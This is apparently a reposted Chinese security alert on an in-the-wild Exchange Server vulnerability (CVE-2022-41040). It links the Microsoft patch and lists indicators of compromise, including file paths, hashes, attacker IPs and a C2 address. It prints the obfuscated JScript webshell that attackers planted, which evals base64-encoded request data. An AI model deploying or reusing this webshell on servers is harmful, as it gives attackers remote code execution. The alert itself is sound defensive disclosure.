⌈漏洞预警⌋-微软Exchange Server 特权提升漏洞
据安全公司 GTSC  检测报告,有在野利用的RCE 正在对 Exchange Server 实施大范围攻击,时间最早可追溯到今年8 月份涉及的软件版本包括:2013、2016、2019此次漏洞CVS 2022-10-2 11:13:12 Author: 攻防之道(查看原文) 阅读量:33 收藏

据安全公司 GTSC  检测报告,有在野利用的RCE 正在对 Exchange Server 实施大范围攻击,时间最早可追溯到今年8 月份

涉及的软件版本包括:201320162019

此次漏洞CVSS 评分高达 8.8  分,强烈建议有相关资产的尽快升级(微软已于9.30日 发布了针对此漏洞的安全补丁)

官方链接 

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040

比较有意思的是这次被抓到的 webshell 竟然是来自 蚁剑 ,编码也是936 ,对应的就是国人常用的 GBK 编码,也就是说这次的攻击很有可能是……,这里是道填空题,请各位自行猜测;此次攻击投入的资源也是相当的大,只跳板机一项就将近20 个。

webshell 脚本如下

<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>

IOCs 内容如下

Webshell:    File Name: pxh4HG1v.ashx                Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx
    File Name: RedirSuiteServiceProxy.aspx                Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx
    File Name: RedirSuiteServiceProxy.aspx                Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx
    File Name: Xml.ashx                Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1                Path: Xml.ashx
    Filename: errorEE.aspx        SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257        Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx
DLL:    File name: Dll.dll    SHA256:      074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82      45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9      9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0      29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3      c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2
    File name: 180000000.dll (Dump từ tiến trình Svchost.exe)      SHA256: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e
IP:125[.]212[.]220[.]485[.]180[.]61[.]1747[.]242[.]39[.]9261[.]244[.]94[.]8586[.]48[.]6[.]6986[.]48[.]12[.]6494[.]140[.]8[.]4894[.]140[.]8[.]113103[.]9[.]76[.]208103[.]9[.]76[.]211104[.]244[.]79[.]6112[.]118[.]48[.]186122[.]155[.]174[.]188125[.]212[.]241[.]134185[.]220[.]101[.]182194[.]150[.]167[.]88212[.]119[.]34[.]11URL:    hxxp://206[.]188[.]196[.]77:8080/themes.aspx
C2:    137[.]184[.]67[.]33

文章来源: http://mp.weixin.qq.com/s?__biz=MzIyNDcwODgwMA==&mid=2247484972&idx=1&sn=3b1b3eac8860ec69c452d4e3ff32f715&chksm=e80b9783df7c1e95d6110e2d8f115d02b24b00b8ca5785d4e70d0bdcd20203618bc70112f1d3#rd
如有侵权请联系:admin#unsafe.sh